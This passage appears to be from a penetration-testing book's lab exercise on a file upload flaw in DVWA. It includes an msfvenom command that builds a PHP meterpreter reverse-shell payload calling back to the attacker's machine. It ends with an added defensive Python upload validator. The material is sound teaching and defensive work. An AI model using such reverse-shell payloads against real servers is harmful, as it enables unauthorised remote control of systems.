In this exercise, we are going to use our OWASP BWA virtual machine to demonstrate a file upload vulnerability. Let's get started:
- First, create a payload on your Kali Linux (attacker) machine using msfvenom, which will later be uploaded to the target server. Using the following syntax, create a PHP-based payload for establishing a reverse connection:
msfvenom -p php/meterpreter/reverse_tcp lhost=<IP address of Kali Linux> lport=4444 -f raw
- Copy the highlighted code, open a text editor, and save the file as img.php:
![](https://static.packt-cdn.com/products/9781789611809/graphics/assets/3515f8e8-4851-440d-8653-46e9b222a624.png)
- Using your web browser within Kali Linux, enter the IP address of OWASP BWA in the address bar and hit Enter.
- On the main page, click on Damn Vulnerable Web Application:
![](https://static.packt-cdn.com/products/9781789611809/graphics/assets/4c9eb84f-eccd-4a1c-bc70-04ce74a48e2c.png)
- The DVWA login portal will appear. Log in with admin/admin as Username/Password:
![](https://static.packt-cdn.com/products/9781789611809/graphics/assets/a72d97a5-d315-4397-b695-4515e21e5566.png)
- Once logged in, you'll see a menu on the left-hand...
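The exercise works because the upload handler trusts the client-supplied filename. The following server-side check, written here as an added example (not code from the book or from DVWA; function and constant names are my own, and the sample inputs are constructed), shows the validation that would have refused img.php, a double-extension name such as img.php.jpg, or an image with PHP tags hidden inside it:

```python
import os
import secrets

# Allowlist of image types the upload form is meant to accept, keyed by
# extension, with the magic bytes each file must begin with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions a typical Apache/PHP setup executes; refused wherever they
# appear in the name, so "img.php" and "img.php.jpg" are both rejected.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

PHP_MARKERS = (b"<?php", b"<?=")


def validate_upload(client_name: str, content: bytes):
    """Return (accepted, reason_or_stored_name).

    Decides from the client-supplied name and the raw bytes whether the
    upload may be stored and, if so, returns a server-chosen filename.
    """
    # Drop any directory components the client supplied (path traversal).
    base = os.path.basename(client_name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    exts = parts[1:]
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False, "executable extension in name"
    ext = exts[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared image type"
    if any(marker in content for marker in PHP_MARKERS):
        return False, "PHP open tag found inside image data"
    # Never reuse the client's name: pick a random one with the checked ext.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples, not files from the exercise.
    for name, data in [("img.php", b"<?php /* constructed sample */ ?>"),
                       ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)]:
        print(name, validate_upload(name, data))
```

Storing the accepted file under the returned name in a directory the web server does not execute scripts from closes the remaining gap the check alone cannot.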